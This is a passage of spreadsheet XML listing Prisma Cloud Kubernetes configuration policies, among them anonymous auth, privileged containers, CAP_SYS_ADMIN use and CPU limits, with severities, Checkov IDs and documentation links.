          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1205" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1205" t="inlineStr">
        <is>
          <t>CKV_K8S_108</t>
        </is>
      </c>
      <c r="AD1205" t="b">
        <v>1</v>
      </c>
      <c r="AE1205" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1205" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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5" t="inlineStr">
        <is>
          <t>e74ba43b-4375-4df3-93c1-f9b5858d9b8d</t>
        </is>
      </c>
      <c r="AI1205" t="inlineStr"/>
      <c r="AJ1205" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1205" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1206">
      <c r="A1206" t="inlineStr"/>
      <c r="B1206" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1206" s="2" t="inlineStr"/>
      <c r="D1206" t="inlineStr"/>
      <c r="E1206" t="inlineStr"/>
      <c r="F1206" t="inlineStr"/>
      <c r="G1206" t="b">
        <v>1</v>
      </c>
      <c r="H12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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1206" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1206" t="inlineStr">
        <is>
          <t>The --peer-cert-file and --peer-key-file arguments are not set appropriately</t>
        </is>
      </c>
      <c r="L1206" t="inlineStr"/>
      <c r="M1206" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1206" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1206" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1206" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1206" t="inlineStr"/>
      <c r="R1206" t="inlineStr"/>
      <c r="S1206" t="inlineStr"/>
      <c r="T1206" t="b">
        <v>0</v>
      </c>
      <c r="U1206" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1206" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1206" t="inlineStr">
        <is>
          <t>Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate</t>
        </is>
      </c>
      <c r="X1206" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-cert-file-and-peer-key-file-arguments-are-set-as-appropriate</t>
        </is>
      </c>
      <c r="Y1206" t="inlineStr"/>
      <c r="Z1206" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1206" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1206" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1206" t="inlineStr">
        <is>
          <t>CKV_K8S_119</t>
        </is>
      </c>
      <c r="AD1206" t="b">
        <v>1</v>
      </c>
      <c r="AE1206" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1206" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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6" t="inlineStr">
        <is>
          <t>63d9f60f-584d-4545-aa72-3f176dd1f164</t>
        </is>
      </c>
      <c r="AI1206" t="inlineStr"/>
      <c r="AJ1206" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1206" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1207">
      <c r="A1207" t="inlineStr"/>
      <c r="B1207" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1207" s="2" t="inlineStr"/>
      <c r="D1207" t="inlineStr"/>
      <c r="E1207" t="inlineStr"/>
      <c r="F1207" t="inlineStr"/>
      <c r="G1207" t="b">
        <v>1</v>
      </c>
      <c r="H12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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1207" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1207" t="inlineStr">
        <is>
          <t>The --anonymous-auth argument is not set to False for API server</t>
        </is>
      </c>
      <c r="L1207" t="inlineStr"/>
      <c r="M1207" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1207" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1207" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1207" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1207" t="inlineStr"/>
      <c r="R1207" t="inlineStr"/>
      <c r="S1207" t="inlineStr"/>
      <c r="T1207" t="b">
        <v>0</v>
      </c>
      <c r="U1207" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1207" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1207" t="inlineStr">
        <is>
          <t>Ensure that the --anonymous-auth argument is set to false</t>
        </is>
      </c>
      <c r="X1207" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false-1</t>
        </is>
      </c>
      <c r="Y1207" t="inlineStr"/>
      <c r="Z1207" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1207" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1207" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1207" t="inlineStr">
        <is>
          <t>CKV_K8S_68</t>
        </is>
      </c>
      <c r="AD1207" t="b">
        <v>1</v>
      </c>
      <c r="AE1207" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1207" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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7" t="inlineStr">
        <is>
          <t>044ce38b-e5b3-424d-833e-fab13219fd43</t>
        </is>
      </c>
      <c r="AI1207" t="inlineStr"/>
      <c r="AJ1207" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1207" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1208">
      <c r="A1208" t="inlineStr"/>
      <c r="B1208" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1208" s="2" t="inlineStr"/>
      <c r="D1208" t="inlineStr"/>
      <c r="E1208" t="inlineStr"/>
      <c r="F1208" t="inlineStr"/>
      <c r="G1208" t="b">
        <v>1</v>
      </c>
      <c r="H12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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1208" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1208" t="inlineStr">
        <is>
          <t>The --kubelet-client-certificate and --kubelet-client-key arguments are not set appropriately</t>
        </is>
      </c>
      <c r="L1208" t="inlineStr"/>
      <c r="M1208" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1208" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1208" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1208" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1208" t="inlineStr"/>
      <c r="R1208" t="inlineStr"/>
      <c r="S1208" t="inlineStr"/>
      <c r="T1208" t="b">
        <v>0</v>
      </c>
      <c r="U1208" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1208" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1208" t="inlineStr">
        <is>
          <t>Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate</t>
        </is>
      </c>
      <c r="X1208" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-client-certificate-and-kubelet-client-key-arguments-are-set-as-appropriate</t>
        </is>
      </c>
      <c r="Y1208" t="inlineStr"/>
      <c r="Z1208" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1208" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1208" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1208" t="inlineStr">
        <is>
          <t>CKV_K8S_72</t>
        </is>
      </c>
      <c r="AD1208" t="b">
        <v>1</v>
      </c>
      <c r="AE1208" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1208" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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8" t="inlineStr">
        <is>
          <t>8dcdae26-1bd2-4a5b-a6a3-31f49e4581f2</t>
        </is>
      </c>
      <c r="AI1208" t="inlineStr"/>
      <c r="AJ1208" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1208" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1209">
      <c r="A1209" t="inlineStr"/>
      <c r="B1209" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1209" s="2" t="inlineStr"/>
      <c r="D1209" t="inlineStr"/>
      <c r="E1209" t="inlineStr"/>
      <c r="F1209" t="inlineStr"/>
      <c r="G1209" t="b">
        <v>1</v>
      </c>
      <c r="H12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09" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1209" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1209" t="inlineStr">
        <is>
          <t>The --profiling argument is not set to False for scheduler</t>
        </is>
      </c>
      <c r="L1209" t="inlineStr"/>
      <c r="M1209" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1209" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1209" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1209" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1209" t="inlineStr"/>
      <c r="R1209" t="inlineStr"/>
      <c r="S1209" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T1209" t="b">
        <v>0</v>
      </c>
      <c r="U1209" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1209" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1209" t="inlineStr">
        <is>
          <t>Ensure that the --profiling argument is set to false</t>
        </is>
      </c>
      <c r="X1209" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-1</t>
        </is>
      </c>
      <c r="Y1209" t="inlineStr"/>
      <c r="Z1209" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1209" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1209" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1209" t="inlineStr">
        <is>
          <t>CKV_K8S_114</t>
        </is>
      </c>
      <c r="AD1209" t="b">
        <v>1</v>
      </c>
      <c r="AE1209" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1209" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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09" t="inlineStr">
        <is>
          <t>b954f1ae-9d6d-4d52-a1db-9d54bde1b36d</t>
        </is>
      </c>
      <c r="AI1209" t="inlineStr"/>
      <c r="AJ1209" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1209" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1210">
      <c r="A1210" t="inlineStr"/>
      <c r="B1210" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1210" s="2" t="inlineStr"/>
      <c r="D1210" t="inlineStr"/>
      <c r="E1210" t="inlineStr"/>
      <c r="F1210" t="inlineStr"/>
      <c r="G1210" t="b">
        <v>1</v>
      </c>
      <c r="H12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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1210" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1210" t="inlineStr">
        <is>
          <t>The --bind-address argument for controller managers is not set to 127.0.0.1</t>
        </is>
      </c>
      <c r="L1210" t="inlineStr"/>
      <c r="M1210" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1210" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1210" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1210" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1210" t="inlineStr"/>
      <c r="R1210" t="inlineStr"/>
      <c r="S1210" t="inlineStr"/>
      <c r="T1210" t="b">
        <v>0</v>
      </c>
      <c r="U1210" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1210" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1210" t="inlineStr">
        <is>
          <t>Ensure that the --bind-address argument is set to 127.0.0.1</t>
        </is>
      </c>
      <c r="X1210" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001</t>
        </is>
      </c>
      <c r="Y1210" t="inlineStr"/>
      <c r="Z1210" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1210" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1210" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1210" t="inlineStr">
        <is>
          <t>CKV_K8S_113</t>
        </is>
      </c>
      <c r="AD1210" t="b">
        <v>1</v>
      </c>
      <c r="AE1210" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1210" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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0" t="inlineStr">
        <is>
          <t>9fa4bd4d-c778-4205-a842-6f75a515ab1c</t>
        </is>
      </c>
      <c r="AI1210" t="inlineStr"/>
      <c r="AJ1210" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1210" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1211">
      <c r="A1211" t="inlineStr"/>
      <c r="B1211" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1211" s="2" t="inlineStr"/>
      <c r="D1211" t="inlineStr"/>
      <c r="E1211" t="inlineStr"/>
      <c r="F1211" t="inlineStr"/>
      <c r="G1211" t="b">
        <v>1</v>
      </c>
      <c r="H12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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1211" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1211" t="inlineStr">
        <is>
          <t>CPU limits are not set</t>
        </is>
      </c>
      <c r="L1211" t="inlineStr"/>
      <c r="M1211" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1211" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1211" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1211" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1211" t="inlineStr"/>
      <c r="R1211" t="inlineStr"/>
      <c r="S1211" t="inlineStr"/>
      <c r="T1211" t="b">
        <v>0</v>
      </c>
      <c r="U1211" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1211" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1211" t="inlineStr">
        <is>
          <t>CPU limits should be set</t>
        </is>
      </c>
      <c r="X1211" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-10</t>
        </is>
      </c>
      <c r="Y1211" t="inlineStr"/>
      <c r="Z1211" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1211" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1211" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1211" t="inlineStr">
        <is>
          <t>CKV_K8S_11</t>
        </is>
      </c>
      <c r="AD1211" t="b">
        <v>1</v>
      </c>
      <c r="AE1211" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1211" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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1" t="inlineStr">
        <is>
          <t>e6f3690e-f808-4aea-811a-2a581128355b</t>
        </is>
      </c>
      <c r="AI1211" t="inlineStr"/>
      <c r="AJ1211" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1211" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1212">
      <c r="A1212" t="inlineStr"/>
      <c r="B1212" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1212" s="2" t="inlineStr"/>
      <c r="D1212" t="inlineStr"/>
      <c r="E1212" t="inlineStr"/>
      <c r="F1212" t="inlineStr"/>
      <c r="G1212" t="b">
        <v>1</v>
      </c>
      <c r="H12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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1212" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1212" t="inlineStr">
        <is>
          <t>Container is privileged</t>
        </is>
      </c>
      <c r="L1212" t="inlineStr"/>
      <c r="M1212" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1212" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1212" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1212" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1212" t="inlineStr"/>
      <c r="R1212" t="inlineStr"/>
      <c r="S1212" t="inlineStr"/>
      <c r="T1212" t="b">
        <v>0</v>
      </c>
      <c r="U1212" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1212" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1212" t="inlineStr">
        <is>
          <t>Container should not be privileged</t>
        </is>
      </c>
      <c r="X1212" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-15</t>
        </is>
      </c>
      <c r="Y1212" t="inlineStr"/>
      <c r="Z1212" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1212" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1212" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1212" t="inlineStr">
        <is>
          <t>CKV_K8S_16</t>
        </is>
      </c>
      <c r="AD1212" t="b">
        <v>1</v>
      </c>
      <c r="AE1212" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1212" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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2" t="inlineStr">
        <is>
          <t>b63bdc58-a1d5-4980-b4dd-11eafc47641e</t>
        </is>
      </c>
      <c r="AI1212" t="inlineStr"/>
      <c r="AJ1212" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1212" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1213">
      <c r="A1213" t="inlineStr"/>
      <c r="B1213" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1213" s="2" t="inlineStr"/>
      <c r="D1213" t="inlineStr"/>
      <c r="E1213" t="inlineStr"/>
      <c r="F1213" t="inlineStr"/>
      <c r="G1213" t="b">
        <v>1</v>
      </c>
      <c r="H12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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1213" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1213" t="inlineStr">
        <is>
          <t>Tiller (Helm V2) deployment is accessible from within the cluster</t>
        </is>
      </c>
      <c r="L1213" t="inlineStr"/>
      <c r="M1213" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1213" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1213" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1213" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1213" t="inlineStr"/>
      <c r="R1213" t="inlineStr"/>
      <c r="S1213" t="inlineStr"/>
      <c r="T1213" t="b">
        <v>0</v>
      </c>
      <c r="U1213" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1213" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1213" t="inlineStr">
        <is>
          <t>Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster</t>
        </is>
      </c>
      <c r="X1213" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-40</t>
        </is>
      </c>
      <c r="Y1213" t="inlineStr"/>
      <c r="Z1213" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1213" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1213" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1213" t="inlineStr">
        <is>
          <t>CKV_K8S_45</t>
        </is>
      </c>
      <c r="AD1213" t="b">
        <v>1</v>
      </c>
      <c r="AE1213" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1213" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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3" t="inlineStr">
        <is>
          <t>ecab4931-c3df-4c60-97b2-70b111f0565f</t>
        </is>
      </c>
      <c r="AI1213" t="inlineStr"/>
      <c r="AJ1213" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1213" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1214">
      <c r="A1214" t="inlineStr"/>
      <c r="B1214" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1214" s="2" t="inlineStr"/>
      <c r="D1214" t="inlineStr"/>
      <c r="E1214" t="inlineStr"/>
      <c r="F1214" t="inlineStr"/>
      <c r="G1214" t="b">
        <v>1</v>
      </c>
      <c r="H12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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1214" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1214" t="inlineStr">
        <is>
          <t>Admission of containers with added capability is not minimized</t>
        </is>
      </c>
      <c r="L1214" t="inlineStr"/>
      <c r="M1214" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1214" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1214" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1214" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1214" t="inlineStr"/>
      <c r="R1214" t="inlineStr"/>
      <c r="S1214" t="inlineStr"/>
      <c r="T1214" t="b">
        <v>0</v>
      </c>
      <c r="U1214" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1214" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1214" t="inlineStr">
        <is>
          <t>Minimize the admission of containers with added capability</t>
        </is>
      </c>
      <c r="X1214" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-24</t>
        </is>
      </c>
      <c r="Y1214" t="inlineStr"/>
      <c r="Z1214" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1214" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1214" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1214" t="inlineStr">
        <is>
          <t>CKV_K8S_25</t>
        </is>
      </c>
      <c r="AD1214" t="b">
        <v>1</v>
      </c>
      <c r="AE1214" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1214" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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4" t="inlineStr">
        <is>
          <t>b6968f2a-4b01-4c02-9931-8e10ac32b8e8</t>
        </is>
      </c>
      <c r="AI1214" t="inlineStr"/>
      <c r="AJ1214" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1214" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1215">
      <c r="A1215" t="inlineStr"/>
      <c r="B1215" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1215" s="2" t="inlineStr"/>
      <c r="D1215" t="inlineStr"/>
      <c r="E1215" t="inlineStr"/>
      <c r="F1215" t="inlineStr"/>
      <c r="G1215" t="b">
        <v>1</v>
      </c>
      <c r="H12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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1215" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1215" t="inlineStr">
        <is>
          <t>CAP_SYS_ADMIN Linux capability is used</t>
        </is>
      </c>
      <c r="L1215" t="inlineStr"/>
      <c r="M1215" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1215" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1215" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1215" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1215" t="inlineStr"/>
      <c r="R1215" t="inlineStr"/>
      <c r="S1215" t="inlineStr"/>
      <c r="T1215" t="b">
        <v>0</v>
      </c>
      <c r="U1215" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1215" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1215" t="inlineStr">
        <is>
          <t>Do not use the CAP_SYS_ADMIN linux capability</t>
        </is>
      </c>
      <c r="X1215" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-36</t>
        </is>
      </c>
      <c r="Y1215" t="inlineStr"/>
      <c r="Z1215" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1215" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1215" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1215" t="inlineStr">
        <is>
          <t>CKV_K8S_39</t>
        </is>
      </c>
